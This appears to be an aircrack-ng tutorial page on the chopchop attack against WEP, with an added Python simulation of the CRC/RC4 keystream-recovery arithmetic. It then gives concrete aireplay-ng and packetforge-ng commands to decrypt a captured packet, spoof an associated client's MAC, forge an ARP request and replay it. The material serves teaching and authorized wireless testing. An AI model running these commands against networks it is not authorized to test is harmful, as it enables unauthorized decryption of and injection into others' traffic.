This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. It does not recover the WEP key itself, but merely reveals the plaintext: aireplay-ng writes the decrypted packet to a .cap file and the recovered keystream (the PRGA bytes the packet was XORed with) to a .xor file, which is what packetforge-ng needs to build new frames. However, some access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter than 60 bytes. If the access point drops packets shorter than 42 bytes, aireplay-ng tries to guess the rest of the missing data, as far as the headers are predictable. If an IP packet is captured, it additionally checks whether the IP header checksum is correct after guessing the missing parts of it. This attack requires at least one WEP data packet.
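The following is an added example, not part of this page nor of aireplay-ng's own code. It simulates the arithmetic behind the chopchop attack on a simplified WEP body (payload followed by a little-endian CRC-32 ICV, XORed with RC4(IV || key)); the access point is modelled as an oracle that only reports whether a submitted body's ICV verifies. The key, IV and payload are constructed values. The 802.11 header, the key-index byte, and aireplay-ng's guessing of short packets are not modelled. What the code shows is why the attack needs no key: because the CRC update is linear, the four-byte correction that makes a chopped packet valid again depends only on the guessed value of the removed plaintext byte, so at most 256 oracle queries per byte reveal that byte and, with it, one keystream byte.

```python
"""Simulated KoreK chopchop (added example; simplified model, not aireplay-ng code)."""
import zlib

# --- CRC-32 (reflected, poly 0xEDB88320) exposed at register level --------
POLY = 0xEDB88320
TABLE = []
for _i in range(256):
    _r = _i
    for _ in range(8):
        _r = (_r >> 1) ^ (POLY if _r & 1 else 0)
    TABLE.append(_r)
# The top byte of every TABLE entry is distinct, so the CRC can be run backwards.
REV = {t >> 24: i for i, t in enumerate(TABLE)}
assert len(REV) == 256


def crc_step(reg, byte):
    return (reg >> 8) ^ TABLE[(reg ^ byte) & 0xFF]


def crc_unstep(reg_after, byte):
    """Register value before `byte` was absorbed, given the value after it."""
    i = REV[reg_after >> 24]
    return ((reg_after ^ TABLE[i]) << 8) | (i ^ byte)


def crc_register(data, reg=0xFFFFFFFF):
    for b in data:
        reg = crc_step(reg, b)
    return reg


# Every valid (payload || ICV) leaves the register at the same residue; four
# zero bytes are the shortest valid body (empty payload, whose ICV is 0).
RESIDUE = crc_register(b"\x00" * 4)


def four_bytes_for(delta):
    """Bytes B with crc_register(B, 0) == delta.  The register update is linear,
    so XORing B into the last four bytes of any message XORs `delta` into that
    message's final register, whatever precedes those bytes."""
    idx, t = [0] * 4, delta
    for k in (3, 2, 1, 0):          # peel the four steps off backwards
        idx[k] = REV[t >> 24]
        t = ((t ^ TABLE[idx[k]]) << 8) & 0xFFFFFFFF
    out, r = bytearray(), 0
    for i in idx:                   # replay them forwards from register 0
        out.append(i ^ (r & 0xFF))
        r = crc_step(r, out[-1])
    return bytes(out)


def chopchop_fixup(guess):
    """Correction to XOR into the last four bytes of a body whose final byte was
    removed, assuming that byte's plaintext was `guess` (independent of the rest)."""
    return four_bytes_for(crc_unstep(RESIDUE, guess) ^ RESIDUE)


# --- RC4 and a simulated access point ------------------------------------
def rc4(key, n):
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


class AccessPoint:
    """Holds the key; the attacker only ever learns accept/reject."""
    def __init__(self, key):
        self.key, self.queries = key, 0

    def encrypt(self, iv, payload):
        body = payload + zlib.crc32(payload).to_bytes(4, "little")
        return xor(body, rc4(iv + self.key, len(body)))

    def accepts(self, iv, ct):
        self.queries += 1
        body = xor(ct, rc4(iv + self.key, len(ct)))
        # zlib's CRC of (payload || ICV) is the bit-inverted register residue
        return len(body) >= 4 and zlib.crc32(body) == (~RESIDUE) & 0xFFFFFFFF


# --- the attack: recover the keystream using only the oracle --------------
def chopchop(ap, iv, ct):
    if len(ct) < 4:
        raise ValueError("body too short to carry an ICV")
    keystream, cur = bytearray(len(ct)), bytes(ct)
    while len(cur) > 4:
        for guess in range(256):
            cand = cur[:-1]
            cand = cand[:-4] + xor(cand[-4:], chopchop_fixup(guess))
            if ap.accepts(iv, cand):        # exactly one guess is accepted
                keystream[len(cur) - 1] = cur[-1] ^ guess
                cur = cand
                break
        else:
            raise RuntimeError("no guess accepted: oracle not behaving as modelled")
    keystream[:4] = cur   # a 4-byte body can only be the empty payload + ICV 00000000
    return bytes(keystream)


def demo():
    """Constructed key, IV and payload (an LLC/SNAP ARP header plus text)."""
    ap = AccessPoint(bytes.fromhex("0102030405"))
    iv = bytes.fromhex("112233")
    payload = bytes.fromhex("aaaa030000000806") + b"chopchop"
    ct = ap.encrypt(iv, payload)
    ks = chopchop(ap, iv, ct)
    return xor(ct, ks)[:-4], ks, ap.queries


if __name__ == "__main__":
    recovered, ks, n = demo()
    print("recovered payload:", recovered, "after", n, "oracle queries")
```

In the simulation the attacker chops all the way down to the four-byte ICV of an empty payload, which yields the complete keystream for that IV; on a real network aireplay-ng stops once the remaining bytes are the predictable LLC/SNAP header, and the real oracle is the access point relaying (or not relaying) the injected frame rather than a function call.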
1. First, we decrypt one packet
aireplay-ng -4 ath0
If this isn't successful, in most cases it is because the access point drops the injected data: the source MAC of the frames is not one of its associated clients. In that case use the MAC address of a connected client which is allowed to send data over the network:
aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0
2. Let's have a look at the IP address
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
3. Then, forge an ARP request
The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2, the live host seen in the decrypted packet above) must respond to ARP requests. The source MAC (here 00:09:5B:EB:C5:2B, the client used in step 1) must belong to an associated station, in case the access point is filtering unauthenticated traffic.
packetforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
4. And replay our forged ARP request
aireplay-ng -2 -r arp.cap ath0